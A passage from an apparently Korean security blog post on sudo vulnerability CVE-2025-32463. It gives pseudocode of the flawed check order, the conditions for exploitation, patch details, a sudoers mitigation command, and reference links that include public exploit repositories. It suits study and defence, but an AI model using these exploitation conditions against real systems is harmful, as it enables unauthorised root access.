&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;실질적인 문제&lt;/span&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;sudo 소스코드를 확인해보자.&lt;/span&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1753775611808&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;int main() {
    parse_args();                    
    
    if (chroot_option) {
        pivot_root(user_specified_dir);  
    }
    
    load_sudoers_policy();           
    check_permissions();           
    
    execute_command();
}&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 코드는 의사코드로 작성된 것이니 어느정도 참고만 하도록하자.&lt;br /&gt;우선 사용자 입력값을 parse_args 함수를 통하여 입력 받는데, 이후 pivot_root 함수가 너무 빨리 수행되어 파일 시스템이 변경된다. 이후 변조된 환경에서 load_sudoers_policy(), check_permissions() 로 인하여 정책 로드와 권한 검사가 수행되어 해당 명령이 수행되게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;종합하여, 본 취약점이 성공하기 위한 조건은 다음과 같다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;sudo 버전 1.9.14 - 1.9.17 설치 및 이용&lt;/li&gt;
&lt;li&gt;sudoers 파일 내 chroot 지시자 존재&lt;/li&gt;
&lt;li&gt;sudo 권한 사용자 계정 접근 가능 여부&lt;/li&gt;
&lt;li&gt;임의 디렉토리 내 쓰기 권한 여부&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;패치 및 대응방안&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;공식 패치 이용 (sudo 1.9.17p1)&lt;/h4&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;사용자 지정 chroot 옵션 완전 제거&lt;/li&gt;
&lt;li&gt;보안 정책 검증 순서 재구성&lt;/li&gt;
&lt;li&gt;pivot_root 호출 타이밍 수정&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;임시 대응책&lt;/h4&gt;
&lt;pre id=&quot;code_1753776058737&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;# sudoers에서 chroot 관련 지시자 제거
sed -i '/chroot/d' /etc/sudoers
visudo -c  # 문법 검증&lt;/code&gt;&lt;/pre&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style7&quot; /&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;종합&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;취약점 CVE-2025-32463 은 sudo 의 설계적 결함에서 비롯된 취약점이다.&lt;br /&gt;해당 결함은 보안 검증보다 환경 변조보다 먼저 수행되어&amp;nbsp;&lt;b&gt;환경 변조 이후에 보안 검증이 수행&lt;/b&gt;되는 구간이 핵심이라고 할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이는 아키텍처 레벨의 보안 설계 오류라고 할 수 있으며, Control Flow - 제어흐름 구간에서의 근본적 문제를 보여준다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 취약점을 통해 시스템이든, 어플리케이션 단이든 어느 정도의 보안성이 요구되는 경우,&amp;nbsp;&lt;b&gt;아키텍처 단의 설계&lt;/b&gt;가 중요하다고 볼 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고:&amp;nbsp;&lt;/p&gt;
&lt;div data-ke-type=&quot;moreLess&quot; data-text-more=&quot;더보기&quot; data-text-less=&quot;닫기&quot;&gt;&lt;a class=&quot;btn-toggle-moreless&quot;&gt;더보기&lt;/a&gt;
&lt;div class=&quot;moreless-content&quot;&gt;
&lt;figure id=&quot;og_1753776497298&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr:443&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&amp;amp;menuNo=205020&amp;amp;nttId=71793&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/xJ1nf/hyZq1Si0Kv/HTB6uFuERGoJSITAoH4bCK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ydm7b/hyZqZfT2RU/UPaxRLKurARJKQG0wvS6hk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/kfxFv/hyZqN7BcoI/XJNGf8vzj8hVSG5kPQHkDk/img.png?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&amp;amp;menuNo=205020&amp;amp;nttId=71793&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&amp;amp;menuNo=205020&amp;amp;nttId=71793&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/xJ1nf/hyZq1Si0Kv/HTB6uFuERGoJSITAoH4bCK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ydm7b/hyZqZfT2RU/UPaxRLKurARJKQG0wvS6hk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/kfxFv/hyZqN7BcoI/XJNGf8vzj8hVSG5kPQHkDk/img.png?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr:443&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776510380&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE-2025-32463 및 CVE-2025-32462 탐지: Sudo 로컬 권한 상승 취약점이 Linux 환경을 위협하다 | SOC Prime&quot; data-og-description=&quot;CVE-2025-32463 및 CVE-2025-32462 &amp;mdash; Sudo의 로컬 권한 상승 취약점에 대한 기술 분석을 SOC Prime 블로그에서 확인하세요.&quot; data-og-host=&quot;socprime.com&quot; data-og-source-url=&quot;https://socprime.com/ko/blog/cve-2025-32463-and-cve-2025-32462-vulnerabilities/&quot; data-og-url=&quot;https://socprime.com/ko/blog/cve-2025-32463-and-cve-2025-32462-vulnerabilities/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/dJbCMQ/hyZq3ihTlg/P7zf2jgQtRkRs5Xbat9SGk/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bn7yuB/hyZqRoBrcB/rwOPoNQmXEsTqE2DdXLIB0/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bcsqhY/hyZqZ71pUw/85BVZzFdDKHmKFSc6WQ48K/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480&quot;&gt;&lt;a href=&quot;https://socprime.com/ko/blog/cve-2025-32463-and-cve-2025-32462-vulnerabilities/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://socprime.com/ko/blog/cve-2025-32463-and-cve-2025-32462-vulnerabilities/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/dJbCMQ/hyZq3ihTlg/P7zf2jgQtRkRs5Xbat9SGk/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bn7yuB/hyZqRoBrcB/rwOPoNQmXEsTqE2DdXLIB0/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bcsqhY/hyZqZ71pUw/85BVZzFdDKHmKFSc6WQ48K/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-32463 및 CVE-2025-32462 탐지: Sudo 로컬 권한 상승 취약점이 Linux 환경을 위협하다 | SOC Prime&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-32463 및 CVE-2025-32462 &amp;mdash; Sudo의 로컬 권한 상승 취약점에 대한 기술 분석을 SOC Prime 블로그에서 확인하세요.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;socprime.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776517118&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;sudo 보안 업데이트 권고 (CVE-2025-32463) - ASEC&quot; data-og-description=&quot;sudo 보안 업데이트 권고 (CVE-2025-32463) ASEC&quot; data-og-host=&quot;asec.ahnlab.com&quot; data-og-source-url=&quot;https://asec.ahnlab.com/ko/88802/&quot; data-og-url=&quot;http://asec.ahnlab.com/ko/88802/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bfb4I1/hyZqRPGhkR/EKscB7IQAMycya5ChIcwW0/img.png?width=1024&amp;amp;height=1024&amp;amp;face=222_278_918_489,https://scrap.kakaocdn.net/dn/c5dhzM/hyZqQpIn5y/JJH3sbWe3AvXPybs0OCqF1/img.png?width=900&amp;amp;height=900&amp;amp;face=189_237_253_307&quot;&gt;&lt;a href=&quot;https://asec.ahnlab.com/ko/88802/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://asec.ahnlab.com/ko/88802/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bfb4I1/hyZqRPGhkR/EKscB7IQAMycya5ChIcwW0/img.png?width=1024&amp;amp;height=1024&amp;amp;face=222_278_918_489,https://scrap.kakaocdn.net/dn/c5dhzM/hyZqQpIn5y/JJH3sbWe3AvXPybs0OCqF1/img.png?width=900&amp;amp;height=900&amp;amp;face=189_237_253_307');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;sudo 보안 업데이트 권고 (CVE-2025-32463) - ASEC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;sudo 보안 업데이트 권고 (CVE-2025-32463) ASEC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;asec.ahnlab.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776528032&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;[Vulnerability Alert] Sudo Local Privilege Escalation (CVE-2025-32462 &amp;amp; CVE-2025-32463)--BytePlus Security Bulletins-Byteplus&quot; data-og-description=&quot;&quot; data-og-host=&quot;docs.byteplus.com&quot; data-og-source-url=&quot;https://docs.byteplus.com/ko/docs/byteplus-security-bulletins/CVE-2025-32463_CVE-2025-32462&quot; data-og-url=&quot;https://docs.byteplus.com/ko/docs/byteplus-security-bulletins/CVE-2025-32463_CVE-2025-32462&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://docs.byteplus.com/ko/docs/byteplus-security-bulletins/CVE-2025-32463_CVE-2025-32462&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://docs.byteplus.com/ko/docs/byteplus-security-bulletins/CVE-2025-32463_CVE-2025-32462&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[Vulnerability Alert] Sudo Local Privilege Escalation (CVE-2025-32462 &amp;amp; CVE-2025-32463)--BytePlus Security Bulletins-Byteplus&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;docs.byteplus.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776539285&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE-2025-6019 취약점 - Remove Spyware &amp;amp; Malware with SpyHunter - EnigmaSoft Ltd&quot; data-og-description=&quot;공격자는 이제 새로 발견된 두 가지 로컬 권한 상승(LPE) 취약점을 악용하여 널리 사용되는 Linux 배포판을 실행하는 시스템에서 전체 루트 권한을 획득할 수 있습니다. 이러한 취약점을 패치하지 &quot; data-og-host=&quot;www.enigmasoftware.com&quot; data-og-source-url=&quot;https://www.enigmasoftware.com/ko/cve20256019vulnerability-jegeohada/&quot; data-og-url=&quot;https://www.enigmasoftware.com/ko/cve20256019vulnerability-jegeohada/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/Fl035/hyZrmaLGvN/9k8qfLOYcusNEhIz2jwaxk/img.jpg?width=500&amp;amp;height=333&amp;amp;face=0_0_500_333&quot;&gt;&lt;a href=&quot;https://www.enigmasoftware.com/ko/cve20256019vulnerability-jegeohada/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.enigmasoftware.com/ko/cve20256019vulnerability-jegeohada/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/Fl035/hyZrmaLGvN/9k8qfLOYcusNEhIz2jwaxk/img.jpg?width=500&amp;amp;height=333&amp;amp;face=0_0_500_333');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-6019 취약점 - Remove Spyware &amp;amp; Malware with SpyHunter - EnigmaSoft Ltd&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;공격자는 이제 새로 발견된 두 가지 로컬 권한 상승(LPE) 취약점을 악용하여 널리 사용되는 Linux 배포판을 실행하는 시스템에서 전체 루트 권한을 획득할 수 있습니다. 이러한 취약점을 패치하지&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.enigmasoftware.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776549759&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE-2025-26465 및 CVE-2025-26466 취약점이 시스템을 중간자 공격 및 DoS 공격에 노출시키다 | SOC Prime&quot; data-og-description=&quot;SOC Prime 블로그에서 취약점 CVE-2025-26465 및 CVE-2025-26466 분석, OpenSSH 결함을 악용할 경우 발생할 수 있는 MitM 및 DoS 공격에 대해 탐구합니다.&quot; data-og-host=&quot;socprime.com&quot; data-og-source-url=&quot;https://socprime.com/ko/blog/cve-2025-26465-cve-2025-26466-vulnerabilities/&quot; data-og-url=&quot;https://socprime.com/ko/blog/cve-2025-26465-cve-2025-26466-vulnerabilities/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/99iDN/hyZqWQZUjf/dmOivkb1MYHFKxyOdsWK31/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bHzZXz/hyZrmBPpWJ/kyovU0j0nCnmxbLA7v9Pg0/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/fZK9b/hyZrwLeAEl/0sPbYYkUxxk3pSObBpr2uk/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480&quot;&gt;&lt;a href=&quot;https://socprime.com/ko/blog/cve-2025-26465-cve-2025-26466-vulnerabilities/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://socprime.com/ko/blog/cve-2025-26465-cve-2025-26466-vulnerabilities/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/99iDN/hyZqWQZUjf/dmOivkb1MYHFKxyOdsWK31/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/bHzZXz/hyZrmBPpWJ/kyovU0j0nCnmxbLA7v9Pg0/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480,https://scrap.kakaocdn.net/dn/fZK9b/hyZrwLeAEl/0sPbYYkUxxk3pSObBpr2uk/img.jpg?width=820&amp;amp;height=480&amp;amp;face=0_0_820_480');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-26465 및 CVE-2025-26466 취약점이 시스템을 중간자 공격 및 DoS 공격에 노출시키다 | SOC Prime&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;SOC Prime 블로그에서 취약점 CVE-2025-26465 및 CVE-2025-26466 분석, OpenSSH 결함을 악용할 경우 발생할 수 있는 MitM 및 DoS 공격에 대해 탐구합니다.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;socprime.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776564744&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - zinzloun/CVE-2025-32463: # CVE-2025-32463 &amp;ndash; Sudo EoP Exploit (PoC) with precompiled .so&quot; data-og-description=&quot;# CVE-2025-32463 &amp;ndash; Sudo EoP Exploit (PoC) with precompiled .so - zinzloun/CVE-2025-32463&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/zinzloun/CVE-2025-32463&quot; data-og-url=&quot;https://github.com/zinzloun/CVE-2025-32463&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/Co4OM/hyZqRPGisW/YKiXaKJ5MCk4H8kpDmqNYK/img.png?width=1200&amp;amp;height=600&amp;amp;face=1012_161_1062_217,https://scrap.kakaocdn.net/dn/blXXqH/hyZqXbjU3b/UNsENlXhNA32Kfurkcks5k/img.png?width=1200&amp;amp;height=600&amp;amp;face=1012_161_1062_217&quot;&gt;&lt;a href=&quot;https://github.com/zinzloun/CVE-2025-32463&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/zinzloun/CVE-2025-32463&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/Co4OM/hyZqRPGisW/YKiXaKJ5MCk4H8kpDmqNYK/img.png?width=1200&amp;amp;height=600&amp;amp;face=1012_161_1062_217,https://scrap.kakaocdn.net/dn/blXXqH/hyZqXbjU3b/UNsENlXhNA32Kfurkcks5k/img.png?width=1200&amp;amp;height=600&amp;amp;face=1012_161_1062_217');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - zinzloun/CVE-2025-32463: # CVE-2025-32463 &amp;ndash; Sudo EoP Exploit (PoC) with precompiled .so&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;# CVE-2025-32463 &amp;ndash; Sudo EoP Exploit (PoC) with precompiled .so - zinzloun/CVE-2025-32463&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776580179&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE‑2025‑32463: Critical Sudo &amp;ldquo;chroot&amp;rdquo; Privilege Escalation Flaw - Upwind&quot; data-og-description=&quot;A critical vulnerability in sudo (Changelog v1.9.14&amp;ndash;1.9.17) allows local users to gain root access via the --chroot (-R) option. This flaw carries a&quot; data-og-host=&quot;www.upwind.io&quot; data-og-source-url=&quot;https://www.upwind.io/feed/cve%E2%80%912025%E2%80%9132463-critical-sudo-chroot-privilege-escalation-flaw&quot; data-og-url=&quot;https://www.upwind.io/feed/cve‑2025‑32463-critical-sudo-chroot-privilege-escalation-flaw&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/3mqQi/hyZqY847E5/RuXdPNsYvT5WpS6YOXyoU1/img.png?width=1600&amp;amp;height=960&amp;amp;face=0_0_1600_960,https://scrap.kakaocdn.net/dn/fLs3R/hyZrpyzMXr/0D4sS7MlTR2gjgTDHKFYd1/img.png?width=1024&amp;amp;height=614&amp;amp;face=0_0_1024_614,https://scrap.kakaocdn.net/dn/bzDyNa/hyZqUZUoQO/sSanlFQ6TWHhdA1aPctKpk/img.png?width=1024&amp;amp;height=614&amp;amp;face=0_0_1024_614&quot;&gt;&lt;a href=&quot;https://www.upwind.io/feed/cve%E2%80%912025%E2%80%9132463-critical-sudo-chroot-privilege-escalation-flaw&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.upwind.io/feed/cve%E2%80%912025%E2%80%9132463-critical-sudo-chroot-privilege-escalation-flaw&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/3mqQi/hyZqY847E5/RuXdPNsYvT5WpS6YOXyoU1/img.png?width=1600&amp;amp;height=960&amp;amp;face=0_0_1600_960,https://scrap.kakaocdn.net/dn/fLs3R/hyZrpyzMXr/0D4sS7MlTR2gjgTDHKFYd1/img.png?width=1024&amp;amp;height=614&amp;amp;face=0_0_1024_614,https://scrap.kakaocdn.net/dn/bzDyNa/hyZqUZUoQO/sSanlFQ6TWHhdA1aPctKpk/img.png?width=1024&amp;amp;height=614&amp;amp;face=0_0_1024_614');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE‑2025‑32463: Critical Sudo &amp;ldquo;chroot&amp;rdquo; Privilege Escalation Flaw - Upwind&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;A critical vulnerability in sudo (Changelog v1.9.14&amp;ndash;1.9.17) allows local users to gain root access via the --chroot (-R) option. This flaw carries a&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.upwind.io&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776588732&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - Mikivirus0/sudoinjection: Sudo Local Privilege Escalation CVE-2025-32463 (Best For Cases Where the shell is not stable &quot; data-og-description=&quot;Sudo Local Privilege Escalation CVE-2025-32463 (Best For Cases Where the shell is not stable to spawn a new root shell) - Mikivirus0/sudoinjection&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/Mikivirus0/sudoinjection&quot; data-og-url=&quot;https://github.com/Mikivirus0/sudoinjection&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cvMpbs/hyZqSuhhYX/nyOjMRjoPMwkyujKusiYH1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/j2Vbi/hyZqSHO0o0/JyxkfpvjMoJqYX3GxBAkVK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/Mikivirus0/sudoinjection&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/Mikivirus0/sudoinjection&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cvMpbs/hyZqSuhhYX/nyOjMRjoPMwkyujKusiYH1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/j2Vbi/hyZqSHO0o0/JyxkfpvjMoJqYX3GxBAkVK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - Mikivirus0/sudoinjection: Sudo Local Privilege Escalation CVE-2025-32463 (Best For Cases Where the shell is not stable&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Sudo Local Privilege Escalation CVE-2025-32463 (Best For Cases Where the shell is not stable to spawn a new root shell) - Mikivirus0/sudoinjection&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776601267&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;hackyboiz&quot; data-og-description=&quot;hack &amp;amp; life&quot; data-og-host=&quot;hackyboiz.github.io&quot; data-og-source-url=&quot;https://hackyboiz.github.io/2025/07/21/poosic/%5BResearch%5D_CVE-2025-32463/EN/&quot; data-og-url=&quot;https://hackyboiz.github.io/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/CcJZg/hyZqOemiRB/JLHU7OgObtK5jXWzJbBDK1/img.png?width=960&amp;amp;height=800&amp;amp;face=0_0_960_800,https://scrap.kakaocdn.net/dn/cAmQKf/hyZq0eK1Ht/JcefKHPvMg2SPq8Ik0bTok/img.png?width=1743&amp;amp;height=1200&amp;amp;face=0_0_1743_1200,https://scrap.kakaocdn.net/dn/zUIil/hyZqOMdLvr/6YYis8q4xUmD6Nfn8lvAT0/img.png?width=1080&amp;amp;height=1080&amp;amp;face=0_0_1080_1080&quot;&gt;&lt;a href=&quot;https://hackyboiz.github.io/2025/07/21/poosic/%5BResearch%5D_CVE-2025-32463/EN/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://hackyboiz.github.io/2025/07/21/poosic/%5BResearch%5D_CVE-2025-32463/EN/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/CcJZg/hyZqOemiRB/JLHU7OgObtK5jXWzJbBDK1/img.png?width=960&amp;amp;height=800&amp;amp;face=0_0_960_800,https://scrap.kakaocdn.net/dn/cAmQKf/hyZq0eK1Ht/JcefKHPvMg2SPq8Ik0bTok/img.png?width=1743&amp;amp;height=1200&amp;amp;face=0_0_1743_1200,https://scrap.kakaocdn.net/dn/zUIil/hyZqOMdLvr/6YYis8q4xUmD6Nfn8lvAT0/img.png?width=1080&amp;amp;height=1080&amp;amp;face=0_0_1080_1080');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;hackyboiz&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;hack &amp;amp; life&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;hackyboiz.github.io&lt;/p&gt;
&lt;/div&gt;
